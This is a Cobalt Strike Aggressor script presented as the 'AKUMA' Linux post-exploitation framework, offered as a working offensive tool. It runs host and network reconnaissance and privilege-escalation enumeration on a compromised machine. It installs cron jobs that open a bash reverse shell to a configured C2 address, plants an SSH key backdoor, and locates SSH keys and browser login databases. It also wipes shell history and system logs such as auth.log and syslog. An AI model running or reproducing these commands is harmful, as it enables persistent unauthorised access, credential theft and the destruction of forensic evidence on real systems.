# AKUMA's Linux Post-Exploitation Framework - SIMPLE VERSION

%postex_config = %(
    c2_server => "192.168.1.100",
    callback_port => 4444,
    backup_ports => @(5555, 6666, 7777),
    working_dir => "/tmp/.akuma"
);

popup beacon_bottom {
    menu "&AKUMA Linux PostEx" {
        menu "&Reconnaissance" {
            item "&Quick System Enum" {
                akuma_quick_enum($1);
            }
            item "&Deep System Scan" {
                akuma_deep_scan($1);
            }
            item "&Network Discovery" {
                akuma_network_discovery($1);
            }
        }
        menu "&Privilege Escalation" {
            item "&Enum for PrivEsc" {
                akuma_privesc_enum($1);
            }
            item "&Kernel Check" {
                akuma_kernel_check($1);
            }
            item "&SUID Hunt" {
                akuma_suid_hunt($1);
            }
        }
        menu "&Persistence" {
            item "&Install Cron" {
                akuma_cron_persistence($1);
            }
            item "&SSH Key Backdoor" {
                akuma_ssh_persistence($1);
            }
        }
        menu "&Data Collection" {
            item "&File Hunt" {
                akuma_file_hunt($1);
            }
            item "&Browser Data" {
                akuma_browser_extract($1);
            }
        }
        menu "&Cleanup" {
            item "&Clear Logs" {
                akuma_cleanup_logs($1);
            }
            item "&Stealth Mode" {
                akuma_stealth_mode($1);
            }
        }
    }
}

sub akuma_quick_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Quick System Enumeration Starting...");
    
    bshell($bid, "echo '=== AKUMA SYSTEM FINGERPRINT ==='");
    bshell($bid, "whoami && hostname && pwd");
    bshell($bid, "uname -a");
    bshell($bid, "cat /etc/os-release 2>/dev/null || cat /etc/issue");
    bshell($bid, "uptime && date");
    
    bshell($bid, "echo '=== USER CONTEXT ==='");
    bshell($bid, "id && groups");
    bshell($bid, "sudo -l 2>/dev/null");
    
    bshell($bid, "echo '=== RUNNING PROCESSES ==='");
    bshell($bid, "ps aux | head -10");
    bshell($bid, "echo '=== NETWORK ==='");
    bshell($bid, "ip addr show 2>/dev/null || ifconfig");
    bshell($bid, "ss -tlnp 2>/dev/null || netstat -tlnp");
    
    blog($bid, "AKUMA Quick Enumeration Complete!");
}

sub akuma_deep_scan {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Deep System Scan Starting...");
    
    bshell($bid, "echo '=== AKUMA DEEP SYSTEM ANALYSIS ==='");
    bshell($bid, "echo '=== SYSTEM INFO ==='");
    bshell($bid, "uname -a");
    bshell($bid, "hostname -f 2>/dev/null || hostname");
    bshell($bid, "cat /proc/version");
    bshell($bid, "lsb_release -a 2>/dev/null");
    
    bshell($bid, "echo '=== HARDWARE ==='");
    bshell($bid, "lscpu 2>/dev/null | head -10");
    bshell($bid, "free -h");
    bshell($bid, "df -h");
    bshell($bid, "lsblk 2>/dev/null");
    
    bshell($bid, "echo '=== USERS & GROUPS ==='");
    bshell($bid, "cat /etc/passwd | grep bash");
    bshell($bid, "cat /etc/group | grep sudo");
    bshell($bid, "lastlog 2>/dev/null | head -10");
    bshell($bid, "w 2>/dev/null");
    
    bshell($bid, "echo '=== SERVICES ==='");
    bshell($bid, "systemctl list-units --type=service --state=running 2>/dev/null | head -20");
    bshell($bid, "ps aux | head -15");
    
    bshell($bid, "echo '=== NETWORK DETAILED ==='");
    bshell($bid, "ip route 2>/dev/null || route -n");
    bshell($bid, "cat /etc/resolv.conf");
    bshell($bid, "arp -a 2>/dev/null | head -20");
    
    blog($bid, "AKUMA Deep Scan Complete!");
}

sub akuma_network_discovery {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Network Discovery Starting...");
    
    bshell($bid, "echo '=== NETWORK DISCOVERY ==='");
    bshell($bid, "ip route | grep -v default | head -5");
    bshell($bid, "arp -a 2>/dev/null | head -20");
    
    bshell($bid, "echo '=== PING SWEEP ==='");
    bshell($bid, "ping -c 1 192.168.1.1 >/dev/null 2>&1 && echo '192.168.1.1 alive'");
    bshell($bid, "ping -c 1 192.168.1.10 >/dev/null 2>&1 && echo '192.168.1.10 alive'");
    bshell($bid, "ping -c 1 10.0.0.1 >/dev/null 2>&1 && echo '10.0.0.1 alive'");
    bshell($bid, "ping -c 1 10.0.0.10 >/dev/null 2>&1 && echo '10.0.0.10 alive'");
    
    bshell($bid, "echo '=== PORT SCAN LOCALHOST ==='");
    bshell($bid, "timeout 1 bash -c 'cat < /dev/null > /dev/tcp/localhost/22' 2>/dev/null && echo 'Port 22 open'");
    bshell($bid, "timeout 1 bash -c 'cat < /dev/null > /dev/tcp/localhost/80' 2>/dev/null && echo 'Port 80 open'");
    bshell($bid, "timeout 1 bash -c 'cat < /dev/null > /dev/tcp/localhost/443' 2>/dev/null && echo 'Port 443 open'");
    
    blog($bid, "AKUMA Network Discovery Complete!");
}

sub akuma_privesc_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Privilege Escalation Enumeration Starting...");
    
    bshell($bid, "echo '=== AKUMA PRIVESC ENUMERATION ==='");
    bshell($bid, "echo '=== CURRENT PRIVILEGES ==='");
    bshell($bid, "id && groups");
    bshell($bid, "sudo -l 2>/dev/null");
    
    bshell($bid, "echo '=== SUID/SGID BINARIES ==='");
    bshell($bid, "find / -perm -4000 -type f 2>/dev/null | head -20");
    bshell($bid, "find / -perm -2000 -type f 2>/dev/null | head -20");
    
    bshell($bid, "echo '=== WRITABLE DIRECTORIES ==='");
    bshell($bid, "find / -writable -type d 2>/dev/null | grep -v proc | head -20");
    
    bshell($bid, "echo '=== CRON JOBS ==='");
    bshell($bid, "crontab -l 2>/dev/null");
    bshell($bid, "cat /etc/crontab 2>/dev/null");
    bshell($bid, "ls -la /etc/cron* 2>/dev/null");
    
    bshell($bid, "echo '=== ROOT PROCESSES ==='");
    bshell($bid, "ps aux | grep '^root' | head -15");
    
    blog($bid, "AKUMA PrivEsc Enumeration Complete!");
}

sub akuma_kernel_check {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Kernel Check Starting...");
    
    bshell($bid, "echo '=== KERNEL EXPLOIT CHECK ==='");
    bshell($bid, "uname -a");
    bshell($bid, "cat /proc/version");
    bshell($bid, "lsb_release -a 2>/dev/null");
    
    bshell($bid, "echo '=== CHECKING VULNERABILITIES ==='");
    bshell($bid, "uname -r");
    
    blog($bid, "AKUMA Kernel Check Complete!");
}

sub akuma_suid_hunt {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA SUID Hunt Starting...");
    
    bshell($bid, "echo '=== SUID/SGID HUNT ==='");
    bshell($bid, "find / -perm -4000 -type f 2>/dev/null | head -30");
    bshell($bid, "find / -perm -2000 -type f 2>/dev/null | head -30");
    
    bshell($bid, "echo '=== POTENTIAL GTFOBINS ==='");
    bshell($bid, "find / -perm -4000 -name 'vim*' 2>/dev/null");
    bshell($bid, "find / -perm -4000 -name 'nano*' 2>/dev/null");
    bshell($bid, "find / -perm -4000 -name 'less*' 2>/dev/null");
    bshell($bid, "find / -perm -4000 -name 'python*' 2>/dev/null");
    
    blog($bid, "AKUMA SUID Hunt Complete!");
}

sub akuma_cron_persistence {
    local('$bid $server $port');
    $bid = $1;
    $server = %postex_config["c2_server"];
    $port = %postex_config["callback_port"];
    
    blog($bid, "AKUMA Cron Persistence Starting...");
    
    bshell($bid, "echo 'Installing cron persistence...'");
    bshell($bid, "(crontab -l 2>/dev/null; echo '*/15 * * * * /bin/bash -c \"bash -i >& /dev/tcp/" . $server . "/" . $port . " 0>&1\"') | crontab -");
    bshell($bid, "(crontab -l 2>/dev/null; echo '@reboot sleep 60 && /bin/bash -c \"bash -i >& /dev/tcp/" . $server . "/" . $port . " 0>&1\"') | crontab -");
    
    blog($bid, "AKUMA Cron Persistence Complete!");
}

sub akuma_ssh_persistence {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA SSH Persistence Starting...");
    
    bshell($bid, "ssh-keygen -t rsa -b 2048 -f ~/.ssh/akuma_key -N '' 2>/dev/null");
    bshell($bid, "cat ~/.ssh/akuma_key.pub >> ~/.ssh/authorized_keys 2>/dev/null");
    bshell($bid, "chmod 600 ~/.ssh/authorized_keys 2>/dev/null");
    bshell($bid, "cat ~/.ssh/akuma_key");
    
    blog($bid, "AKUMA SSH Persistence Complete! Private key printed above.");
}

sub akuma_file_hunt {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA File Hunt Starting...");
    
    bshell($bid, "echo '=== SENSITIVE FILE HUNT ==='");
    bshell($bid, "echo '=== DOCUMENTS ==='");
    bshell($bid, "find /home -name '*.pdf' 2>/dev/null | head -20");
    bshell($bid, "find /home -name '*.doc*' 2>/dev/null | head -20");
    bshell($bid, "find /home -name '*.xls*' 2>/dev/null | head -20");
    
    bshell($bid, "echo '=== SSH KEYS ==='");
    bshell($bid, "find /home -name 'id_*' 2>/dev/null | head -10");
    bshell($bid, "find /home -name '*.pem' 2>/dev/null | head -10");
    
    bshell($bid, "echo '=== ARCHIVES ==='");
    bshell($bid, "find /home -name '*.zip' 2>/dev/null | head -15");
    bshell($bid, "find /home -name '*.rar' 2>/dev/null | head -15");
    bshell($bid, "find /home -name '*.tar*' 2>/dev/null | head -15");
    
    blog($bid, "AKUMA File Hunt Complete!");
}

sub akuma_browser_extract {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Browser Extract Starting...");
    
    bshell($bid, "echo '=== BROWSER DATA EXTRACTION ==='");
    bshell($bid, "echo '=== FIREFOX ==='");
    bshell($bid, "find /home -path '*/firefox/*/places.sqlite' 2>/dev/null");
    bshell($bid, "find /home -path '*/firefox/*/key4.db' 2>/dev/null");
    bshell($bid, "find /home -path '*/firefox/*/logins.json' 2>/dev/null");
    
    bshell($bid, "echo '=== CHROME ==='");
    bshell($bid, "find /home -path '*chrome*/Login Data' 2>/dev/null");
    bshell($bid, "find /home -path '*chrome*/History' 2>/dev/null");
    bshell($bid, "find /home -path '*chromium*/Login Data' 2>/dev/null");
    
    blog($bid, "AKUMA Browser Extract Complete!");
}

sub akuma_cleanup_logs {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Log Cleanup Starting...");
    
    bshell($bid, "echo '=== LOG CLEANUP ==='");
    bshell($bid, "echo 'Clearing user history...'");
    bshell($bid, "> ~/.bash_history");
    bshell($bid, "> ~/.zsh_history");
    bshell($bid, "history -c");
    bshell($bid, "export HISTFILE=/dev/null");
    bshell($bid, "unset HISTFILE");
    
    bshell($bid, "echo 'Attempting system log cleanup (requires root)...'");
    bshell($bid, "if [ \"$EUID\" -eq 0 ]; then echo 'Root detected - clearing system logs'; > /var/log/auth.log; > /var/log/secure; > /var/log/messages; > /var/log/syslog; else echo 'Need root for system log cleanup'; fi");
    
    blog($bid, "AKUMA Log Cleanup Complete!");
}

sub akuma_stealth_mode {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Stealth Mode Starting...");
    
    bshell($bid, "export HISTFILE=/dev/null");
    bshell($bid, "unset HISTFILE");
    bshell($bid, "history -c");
    bshell($bid, "set +o history");
    
    bshell($bid, "rm -rf /tmp/.akuma* 2>/dev/null");
    bshell($bid, "rm -rf /var/tmp/.akuma* 2>/dev/null");
    
    bshell($bid, "echo 3 > /proc/sys/vm/drop_caches 2>/dev/null || echo 'Cannot clear caches'");
    
    blog($bid, "AKUMA Stealth Mode Enabled!");
}

blog("AKUMA Linux PostEx Framework Loaded!");
